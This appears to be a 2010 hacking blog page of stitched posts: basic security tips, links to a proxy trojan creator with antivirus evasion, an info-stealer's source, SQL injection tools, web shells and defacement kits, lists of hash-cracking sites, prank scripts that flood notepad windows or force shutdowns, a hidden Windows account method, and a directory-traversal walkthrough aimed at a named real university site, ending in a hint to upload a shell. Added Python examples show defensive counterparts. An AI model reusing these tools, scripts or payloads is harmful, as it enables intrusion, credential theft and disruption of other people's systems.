Thursday, September 30, 2010

Security Tips Helpful Security Tips for Internet Users and Website owners

Special Thanks To Zarabyte Security 
Account Security Tips
1. Avoid common passwords; use alphanumeric passwords.
2. Use a different password for each site you visit. Don't keep reusing the same password: about 98% of online users don't use more than 10 different passwords. I recommend a different password for every site. Because a lot of people are lazy, they use the same password for everything, and your typical hacker loves this kind of thing since it makes it a lot easier to gain access to all your accounts. Using different passwords will take them longer.
3. Another bad habit is storing important information in your e-mail. You should not keep really important information in your inbox, as a lot of hackers get snoopy and will go through your emails looking for useful things like usernames and passwords for other sites, credit card info, bank account info, etc.
4. Be careful when using credit cards on online sites. Most websites store your credit card info in what is called an SQL database. If the website doesn't have good security on its files, there is a good chance your credit card information could be compromised, since a lot of databases store your billing information in plain text.
Wireless Security Tips
1. Be careful when using cyber cafes, as it is easy for a hacker to sniff your information over the network.
2. When setting up a wireless network, don't use WEP, as WEP can be cracked really easily. Use WPA/WPA2 and don't use an easy passphrase.
3. Be careful when using someone else's wireless internet, and try not to do anything important on networks you don't own. I recommend you buy a VPN when using a wireless network that isn't yours; as I said, a hacker can sniff HTTP information, email passwords and usernames, and even AIM/Yahoo/ICQ/MSN chats.
4. Buy a VPN if you're going to be traveling a lot and using wireless networks at hotels and other places. A VPN is basically a tunnel: when a hacker tries to sniff your information while you're logged in through a VPN, he won't see your information.

Webmaster Security Tips
1. Protect your visitors: encrypt your visitors' passwords and credit card information!
2. Check your website for SQL injections and look into fixing your code.
3. Make sure your server is up to date with all security patches.
4. Hide, rename or remove the admin folder, or password-protect the folder.
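
An added example for Webmaster tips 1 and 2 (not code from the original post): a constructed in-memory SQLite login table, first with the weak pattern (plain-text password, query built by string concatenation), then hardened with parameterized queries and salted PBKDF2 hashing, which is used here in place of reversible encryption for passwords. Table names, function names and the sample account are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000  # work factor chosen for this example


def open_db():
    """Create an in-memory database holding a weak and a hardened user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE weak_users (name TEXT PRIMARY KEY, password TEXT)")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    return db


# --- weak version: what tips 1 and 2 warn about -----------------------------

def weak_register(db, name, password):
    # The password is stored exactly as typed, so a database leak exposes it.
    db.execute("INSERT INTO weak_users VALUES (?, ?)", (name, password))


def weak_login(db, name, password):
    # User input is pasted into the SQL text, so a quote character in the
    # input changes the meaning of the query (SQL injection).
    sql = ("SELECT name FROM weak_users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return db.execute(sql).fetchone() is not None


# --- hardened version --------------------------------------------------------

def hash_password(password, salt):
    """Slow, salted hash; only the salt and this digest are stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def register(db, name, password):
    salt = os.urandom(16)  # fresh random salt per account
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               (name, salt, hash_password(password, salt)))


def login(db, name, password):
    # The ? placeholder sends the input as data, never as SQL text.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (name,)).fetchone()
    if row is None:
        hash_password(password, b"\x00" * 16)  # same work for unknown users
        return False
    salt, stored = row
    # Constant-time comparison of the stored and recomputed digests.
    return hmac.compare_digest(stored, hash_password(password, salt))


def demo():
    """Run the same inputs against both versions (constructed sample data)."""
    db = open_db()
    weak_register(db, "alice", "S3cret-pass")
    register(db, "alice", "S3cret-pass")
    crafted = "' OR '1'='1"  # input containing quote characters
    return {
        "weak_correct_password": weak_login(db, "alice", "S3cret-pass"),
        "weak_crafted_input": weak_login(db, "alice", crafted),
        "hardened_correct_password": login(db, "alice", "S3cret-pass"),
        "hardened_crafted_input": login(db, "alice", crafted),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(case, "->", "accepted" if accepted else "rejected")
```
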

 .....................................................................................................................................................................................................................
 .....................................................................................................................................................................................................................
 ..................................................................................................................................................................................................................... 

Reverse A Phisher Program

Special Thanks To Zarabyte Security
Step 1 - Head to http://reflector.red-gate.com/Download.aspx and download .NET Reflector
Step 2 - Run .NET Reflector
Step 3 - Download the phisher you want to reverse
Step 4 - Go into your Downloads folder and load your phisher into .NET Reflector
Step 5 - Expand your phisher
Step 6 - Open the entry that has the name of the file, not the ".MY", ".MY.RESOURCES", "-" or "references"
Step 7 - There's usually a form1; expand it
Step 8 - Look for button1_click, or something very similar (it's usually near the top), right-click it and click "Disassemble"
Step 9 - Now look for Network credentials, and you have the email info
Step 10 - Go to the email, check the inbox


[How to find phishers on youtube]

What to search for

MapleStory:

Meso Generator

NX Generator

Rapidshare:
Point Generator

XBL:

Xboxlive generator
Points Generator

RuneScape:

Item generator
Gold Generator
Skill Changer

 .........................................................................................................................................................................................................................
 .........................................................................................................................................................................................................................
 .........................................................................................................................................................................................................................

A Complete List of md5 Web Crackers




Here is a nice list of online md5 crackers, enjoy:

- md5gle.com

- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)

- md5Crack.com | online md5 cracker

- [ md5 crack password crack hash checker ]

- md5cracker.tk (MD5 Search engine by searches a total of 14 on-line crackers.)

- Index of / (5,889,729)

- AP3 Designs

- http://md5-db.com (The database is approximately 70gb)

- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)

- GData: An Online MD5 Hash Database (3,251,106)

- TMTO[dot]ORG (306.000.000.000)

- milw0rm.com - free md5/lm hash cracking (Milw0rm Cracker db)

- BlackLight's hash cracker (2,456,288)

- .:Shell-Storm.org:. | DataBase MD5 | ( The data base currently contains 169582 passwords )

- Parallels Confixx (Need Account)

- http://passcracking.com/ (Register to increase your priority)

- http://www.xmd5.org

- Hashkiller.com

- plain-text.info

- insidepro.com

- md5decrypter.co.uk

- c0llision.net

- md5pass.info

- hashcrack.com

- generuj.pl

- authsecu.com

- md5decryption.com

- chwett.com/md5

- md5this.com

- tmto.org

- kerinci.net

- hash.db.hk

- crackfor.me

- md5hood.com

- neofusion.de

- md5.shalla.de

- md5.my-addr.com

- hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}

- md5.opencracking.info

- md5online.net

- macrosoftware.ro/md5

- netmd5crack.com

- bokehman.com

- hash-database.net

- thoran.eu

- md5-database.net

- web-security-services.com

- bitdelivery.net
-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
http://www.md5oogle.com/md5hashes.php
[ md5 crack password crack hash checker ]
milw0rm.com - free md5/lm hash cracking
darkc0de.com [ index ]

-----------------------------------------------------------------
MULTI
-----------------------------------------------------------------
md5cracker.org
md5.igrkio.info
hashkiller.com
hashchecker.de
sinhalayo159.07x.net
-----------------------------------------------------------------
IRC
-----------------------------------------------------------------
plain-text.info (irc.Plain-Text.info #rainbowcrack |||| irc.rizon.net #rainbowcrack)
md5.overclock.ch (irc.rizon.net #md5)
c0llision.net (irc.after-all.org #md5crack |||| ircd.hopto.org #md5crack)
-----------------------------------------------------------------
ICQ
-----------------------------------------------------------------
c0llision.net (427-921-047) <- md5, ntlm
hashkiller.com (405-701-776) <- md5



-----------------------------------------------------------------
LM
-----------------------------------------------------------------
lmcrack.com
plain-text.info
-----------------------------------------------------------------
NTLM
-----------------------------------------------------------------
plain-text.info
md5decrypter.co.uk
-----------------------------------------------------------------
SHA1
-----------------------------------------------------------------
md5.rednoize.com
hash.db.hk
md5decrypter.co.uk
-----------------------------------------------------------------
SHA256
-----------------------------------------------------------------
md5.shalla.de
hash.db.hk
-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
Rainbow Tables . net

.................................................................................................................................... ................................................................................................................................................................................................ 
.................................................................................................................................... ................................................................................................................................................................................................
.................................................................................................................................... ................................................................................................................................................................................................

Wednesday, September 29, 2010

Download Free The Best Hacking Tools Collection


The Best Hacking Tools Collection

Collection Includes:
1. Port & IP Scanner
2. Ping & Nukes
3. Java
4. Mail Bomb
5. Chat
6. Serial Software
7. Keyboard Key Logger
8. Credit Card Generator
9. Crash Hard Drive
10.Password Recovery Tool
11.Security
12.Clients

Free Download:
1. Hotfile
2. Uploading

..................................................................................................... .....................................................................................................................
..................................................................................................... .....................................................................................................................
..................................................................................................... .................................................................................................................... 

Tuesday, September 28, 2010

Online Scanners and Malware Analysers

Here is a compiled list of online scanners and malware analysers.

URL : Virus Total
About :

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs:

  • Free, independent service
  • Use of multiple antivirus engines
  • Real-time automatic updates of virus signatures
  • Detailed results from each antivirus engine
  • Real time global statistics

URL : Jotti's Malware Scan
About :

Jotti's malware scan is a free online service that enables you to scan suspicious files with several anti-virus programs. Scanners used are Linux versions; detection differences with Windows versions of the same scanners may occur due to implementation differences. There is a 20MB limit per file. Keep in mind that no security solution offers 100% protection, not even when it uses several anti-virus engines (for example, this scan service).
Files uploaded here are shared with anti-virus companies so detection accuracy of their anti-virus products can be improved. Read more about this in our privacy policy. If you do not want your files to be distributed, please do not send them at all.


URL : Anubis : Analysing Unknown Binaries
About :

Anubis is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of Anubis results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system, about interactions with the Windows Service Manager or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching i.e. analyzing its execution. The analysis focuses on the security-relevant aspects of a program's actions, which makes the analysis process easier and because the domain is more fine-grained it allows for more precise results. It is the ideal tool for the malware and virus interested person to get a quick understanding of the purpose of an unknown binary.


URL : ThreatExpert
About :

ThreatExpert (patent pending) is an advanced automated threat analysis system (ATAS) designed to analyze and report the behavior of computer viruses, worms, trojans, adware, spyware, and other security-related risks in a fully automated mode.
The ThreatExpert system produces reports with the level of technical detail that matches or exceeds antivirus industry standards such as those found in online virus encyclopedias.


URL : VirSCAN
About :

VirSCAN.org is a FREE on-line scan service, which checks uploaded files for malware, using antivirus engines, indicated in the VirSCAN list. On uploading files you want to be checked, you can see the result of scanning and how dangerous and harmful/harmless for your computer those files are.


URL : UploadMalware
About :

UploadMalware.com is an easy way for you to submit files for analysis by anti-malware and security professionals.



URL : CWSandbox
About :

Sunbelt CWSandbox provides fast analysis of virus, spyware, trojan, or other malware samples. CWSandbox enables the automatic collection of malware from different inputs including Nepenthes, a web server/interface, or a directory.
Rapidly analyze behavior of malware - including infected trojans, Office documents, browser helper objects (BHOs), malicious URLs and more - by executing the code inside a controlled environment, the Sunbelt malware sandbox!


URL : Norman Sandbox
About :

Norman Sandbox offers -

  • Free uploads of program files that you suspect are malicious or infected by malicious components, and instant analysis by Norman SandBox. The result is also sent you by email.
  • In-depth information about the analysis performed by Norman SandBox of each malicious file that is uploaded. Search facility in all analyses after Registry keys, file names, etc.
  • Comprehensive statistics of files that are uploaded to Norman SandBox center during the latest day, week and month. You will then be able to see tendencies in the creation of malicious software.

URL : Joebox
About :

Joebox is a simple sandbox application with a unique special concept. It is designed for automatic behaviour analysis of malware on Windows based operating systems.


URL : Microsoft Malware Protection
About :

The Microsoft Malware Protection Center (MMPC) provides world class antimalware research and response capabilities that support Microsoft's range of security products and services. With laboratories in multiple locations around the globe the MMPC is able to respond quickly and effectively to new malicious and potentially unwanted software threats wherever and whenever they arise.


URL : SuspectFile
About :

It is not in English and I don't understand it. Use a translator if you are very interested.


URL : F-Secure Sample Analysis System
About :

It requires registration for a person to submit samples, but registration is free.


URL : Wepawet
About :

Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash and JavaScript files. Things you can do with Wepawet -

  • Determine if a page or file is malicious
  • Analyze a malicious resource
  • Identify the attacks launched by a malicious resource


URL : Eureka Malware Analysis Page
About :

Eureka is a binary static analysis preparation framework. It implements a novel binary unpacking strategy based on statistical bigram analysis and coarse-grained execution tracing. Eureka incorporates advanced API deobfuscation capabilities to facilitate the structural analysis of the underlying malware logic. For each uploaded binary, the Eureka service will attempt to unpack and disassemble the binary, and will produce an annotated callgraph, subroutine/data index page, strings summary, and list of embedded DNS entries.


URL : Comodo Instant Malware Analysis
About :

This is a secure malware analysis system which gives a detailed report of what an executable does including registry edits and creating of folders and deleting them.


URL : NoVirusthanks
About :

Free service that allows users to upload and scan a file with 24 Antivirus Engines. Users can also scan a website url or a remote file with the option Scan Web Address.


URL : VirusTrap
About :

VirusTrap is a commercial service for penetration testers, network auditors, system administrators who need to analyze unknown binaries during their work. Our scanner was made to help computer users identifying malicious files by scanning them with 25 antivirus engines.


URL : Online Virus Scan
About :

VirusChief is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs:
- Free, independent service
- Use of multiple antivirus engines
- Real-time automatic updates of virus signatures
- Detailed results from each antivirus engine
- Link output
- BB-Code output
- File deletion after the scan-report was generated


URL : FortiGuard
About :

Yet another malware scanner which lets you upload unknown binaries and gives you a report about them via email.


URL : Filterbit - OPSWAT Metascan
About :

Powered by OPSWAT Metascan®, Filterbit™ is a free service where you can upload files for scanning, analysis and identification by multiple antivirus engines. Filterbit facilitates rapid detection of viruses, trojans, worms and other malware that may be contained within your uploaded files. In many cases, Filterbit can also scan, analyze and individually identify multiple files contained within a file archive such as Winzip, WinRar, PKZip and other types. Filterbit also analyzes the types of each uploaded file such as Microsoft Word, PDF, TXT and other types and reports this in a human readable format. Filterbit currently uses Metascan® antivirus engines from CA (Computer Associates), Norman Data Defense Systems, ClamAV, ESET, Microworld and VirusBuster.

............................................................................................................................................... ........................................................................
............................................................................................................................................... ........................................................................
............................................................................................................................................... ........................................................................ 

shellz scanner


It uses some dorks to find uploaded shells, once u found a good one u can use the proxy checker to be anonymous and surf using the integrated navigator...

u need the ocx of winsock if u use the proxy finder.

http://www.megaupload.com/fr/?d=T93DHKDB

.............................................................................................................................................................................................................
.............................................................................................................................................................................................................
.............................................................................................................................................................................................................

Download Free WebProxy Trojan Creator V.1.2 With Video Tutorial

W3bPr0xy Tr0j4n Creator V.1.2 By fLaSh
This tool creates a full proxy trojan to use as a private proxy.
The trojan is only about 47 KB (no icon)!
Coded by me with VB.NET and C# (.NET Framework v.2)

Features:
- Fully proxy server trojan with Hijacking EXE with embedded the trojan;
- Supports multi-listening ports;
- Supports multi-connections from various clients (multi-thread system);
- Supports cookies;
- Supports SSL;
- Report IP/Ports to mail of the trojan owner;
- Assembly Manipulation (version info, change icon, etc.);
- Trojan compressed binary (anti-embedded detection AV);
- Etc.

Screen Shots:


Download Link:
http://rapidshare.com/files/21358005...0j4n_v.1.2.rar

Video tutorial:
http://rapidshare.com/files/21397609...0j4n_v.1.2.wmv

........................................................................................... .............................................................................................................................
........................................................................................... .............................................................................................................................
........................................................................................... ............................................................................................................................. 

How to Fix Folder Options Missing Problem

Hello friends, today I am going to explain how to get back the Folder Options. It often happens that viruses infect your system and Folder Options goes missing. First of all, friends, let me share one thing with you all: 90 percent of viruses don't delete things on your computer, they just modify their properties, either hiding them or corrupting them. And for your information, there are several ways to recover from that. Today I am sharing with you "How to Fix Folder Options Missing Problem".

STEPS INVOLVED:
1. Go to the Start menu and open Run.

2. In Run, type "gpedit.msc" (without quotes) and press Enter.

3. Now you will see something like this.


4. Now go to User Configuration >> Administrative Templates >> Windows Components >> Windows Explorer.

5. Click on Windows Explorer; you will find the 3rd option on the right side of the screen, "Removes the Folder Options menu item from the Tools menu".

6. Just check it: if it is Not Configured, change it to Enabled by double-clicking on it, and after applying, set it to Not Configured again.

7. I hope that you will find the option after restarting Windows.


That's the overall process of fixing the Folder Options Missing Problem.
................................................................................................................................................. .....................................................................
................................................................................................................................................. .....................................................................
................................................................................................................................................. ..................................................................... 

Monday, September 27, 2010

Very Good Notepad Hacks

Hey friends, today I am going to share a few new Notepad hacks. They are really cool and crazy ones, so please think at least three or four times before using them on your PC.


UNLIMITED NOTEPAD WINDOWS HACK
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
       

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:
 
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................  

VistaLogger



File Info

Report generated: 28.7.2009 at 22.12.43 (GMT 1)
Filename: testwindowsxp.exe
File size: 20 KB
MD5 Hash: 9bce818115941b46e31c0583c482b820
SHA1 Hash: E09D12C8B34595C97EDFA103C3339DBD4D395F4A
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 22

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

http://www.multiupload.com/9GLI5JZ6TE
........................................................................................................ ................................................................................................................
........................................................................................................ ................................................................................................................
........................................................................................................ ................................................................................................................ 

Hack Websites A Good Collection Of SQL Injection Tools


1.Havij 1.7 -

http://rapidshare.com/files/322555573/Havij_1.07.exe

2.SQLi Helper 2.7 -
http://rapidshare.com/files/322556434/sqliHelper_2.7.rar

3.SQLi Injecter V2.0 -

http://rapidshare.com/files/322559013/SqlInjv2.rar

4.m4x MSSQL Injection

http://rapidshare.com/files/322557397/m4xmssql.rar

5.m4x MySQL Injection
http://rapidshare.com/files/322559902/m4xmysql.rar

6.SQL TooL v2.3

http://rapidshare.com/files/322560724/SQL_TOOL_V2.3.rar

7.
Simple SQLi Dumper v0.1

http://rapidshare.com/files/322561134/Simple_SQLi_Dumper.rar

.....................................................................................................................................................................................................................
.....................................................................................................................................................................................................................
.....................................................................................................................................................................................................................
..................................................................................................................................................................................................................... 

Default Best Collection Of Shells

....................................................................................................... ..................................................................................................................
....................................................................................................... ..................................................................................................................
....................................................................................................... .................................................................................................................. 

[VB6] iStealer 5.0 [Source]

I've only seen it on unkn0wn and opensc, so here it is.

PS. When I said I have only seen it on unkn0wn and opensc, I meant the only "legit" source I have seen.
Download:
http://rapidshare.com/files/269600583/iStealer_5.0_Source.rar

...................................................................................................................... ....................................................................................................
...................................................................................................................... ....................................................................................................
...................................................................................................................... ................................................................................................... 

Defacement Tools (With Video Tutorial)

Defacement Tools





Now you can see what's hidden

DOWNLOAD :

or
FOR FURTHER TUT :
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
......................................................................................................................................................................................................................... 

Create Hidden Account In Windows XP

Since all of the editing is done in the Windows Registry, it is recommended to back up the registry before going further.

After you have backed up your registry, follow these steps to create your hidden account:
First go to Start -> Run -> type regedit -> Enter
In the left pane, go to

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

In the right pane, right click -> New -> String Value
Right click on the new String Value and click Rename
Type the name of the account you want to hide.
Hit Enter, then right click on the String Value again and change the value to 0, which hides it. If you want it to be visible to all, enter the value 1.
Now save and exit the registry and log off.
Go to the Welcome screen and hit Ctrl+Alt+Del twice to bring up the logon prompt
Type the hidden account's name and password
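
From the defender's side, the same key is worth auditing, because any account listed under SpecialAccounts\UserList with the value 0 is missing from the Welcome screen. The Python below is an added example, not part of the original post: it scans a regedit text export for such entries and accepts both string and DWORD data. The sample export, the account names and the `expected` allowlist are constructed for illustration.

```python
import re

# Key named in the steps above; registry key names are case-insensitive.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList")

# Constructed sample of a regedit text export (not from a real machine).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"HelpAssistant"=dword:00000000
"svc_backup"="0"
"alice"=dword:00000001
'''

SECTION = re.compile(r"^\[(.+)\]$")
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')

def hidden_accounts(reg_text, expected=()):
    """Return accounts set to 0 (hidden) that are not in the `expected` allowlist."""
    allowed = {name.lower() for name in expected}
    in_userlist = False
    findings = []
    for raw in reg_text.splitlines():
        line = raw.strip()
        section = SECTION.match(line)
        if section:
            # Only values under the UserList key are of interest.
            in_userlist = section.group(1).lower() == USERLIST_KEY.lower()
            continue
        value = VALUE.match(line) if in_userlist else None
        if not value:
            continue
        name, data = value.group(1), value.group(2).strip()
        if data.lower().startswith("dword:"):
            hidden = int(data[6:], 16) == 0
        else:
            hidden = data.strip('"') == "0"
        if hidden and name.lower() not in allowed:
            findings.append(name)
    return findings

if __name__ == "__main__":
    print(hidden_accounts(SAMPLE_EXPORT, expected=["HelpAssistant"]))
```

Comparing the result against the output of `net user` shows which hidden names are real local accounts rather than leftover entries.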

.................................................................................................................................. ....................................................................................
.................................................................................................................................. ....................................................................................
.................................................................................................................................. .................................................................................... 

How to hack websites using LFI (Local File Inclusion): A Directory Traversal Attack


What is the root directory of a web server?

It is a specific directory on the server in which the web content is placed and can be seen by website visitors. Directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible to a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, suppose we are at the location C:\xx\yy\zz. On typing ..\ , we would reach C:\xx\yy.

Again on typing ..\ , we would reach C:\xx.

Let's go back to the location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt. Typing ..\ two times takes us two directories up (that is, to directory xx), where abc.txt is placed.

Note: It's ..\ on Windows and ../ on UNIX-like operating systems.

What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website vulnerable to directory traversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory 'etc' on UNIX/Linux which contains configuration files of programs that run on the system. Some of the files placed in the 'etc' directory are passwd, shadow, profile, sbin.

The file etc/passwd contains the login names of users and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Look carefully at the position of the directories placed on the web server.


We do not know the actual names and contents of the directories except 'etc', which is the default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.


Let's type this in the URL field and press Enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search for the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E) and look for 'etc', but again it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D) and look for 'etc', but again it will return nothing.

So by proceeding like this, we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to the 'etc' directory and shows us the contents of the 'passwd' file.

To understand the contents of the 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view etc/profile, etc/services and many other files, like backup files, which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only to privileged users.

Note: If proc/self/environ is accessible, you might upload a shell on the server, which is called Local File Inclusion.

Counter Measures
1. Use the latest web server software
2. Effectively filter the user's input
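
One way to implement the second countermeasure, as an added example that is not code from the original post or from the site shown above: decode the `page` value, canonicalise it, and serve it only if the result is still inside the web root. It is written in Python so it runs stand-alone (PHP's realpath() supports the same canonicalise-then-compare check); `resolve_page`, `demo` and the file names are hypothetical, and every input is constructed.

```python
import os
import tempfile
from urllib.parse import unquote

def resolve_page(web_root, page):
    """Return the real path for `page` if it stays inside web_root, else None."""
    # Decode repeatedly so %2e%2e%2f and double-encoded forms are seen as ../
    decoded = page
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return None
    # Treat ..\ the same as ../ regardless of the host operating system.
    decoded = decoded.replace("\\", "/")
    root = os.path.realpath(web_root)
    # realpath collapses ../ and follows symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(root, decoded))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:  # e.g. different drives on Windows
        inside = False
    return candidate if inside and os.path.isfile(candidate) else None

def demo():
    """Build a throwaway web root and check constructed request values."""
    with tempfile.TemporaryDirectory() as top:
        web_root = os.path.join(top, "htdocs")
        os.makedirs(web_root)
        for path in (os.path.join(web_root, "notification.php"),
                     os.path.join(top, "secret.txt")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        values = ["notification.php", "../secret.txt", "..%2fsecret.txt",
                  "%252e%252e%252fsecret.txt", "..\\secret.txt",
                  "../../../../../etc/passwd", "/etc/passwd"]
        return {v: resolve_page(web_root, v) is not None for v in values}

if __name__ == "__main__":
    for value, allowed in demo().items():
        print("ALLOW" if allowed else "DENY ", value)
```

Where the set of pages is small and fixed, mapping the parameter to an allowlist of known file names is stricter still, since the user's value is then never used as a path at all.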
................................................................. .....................................................................................................................................................
................................................................. .....................................................................................................................................................
................................................................. .....................................................................................................................................................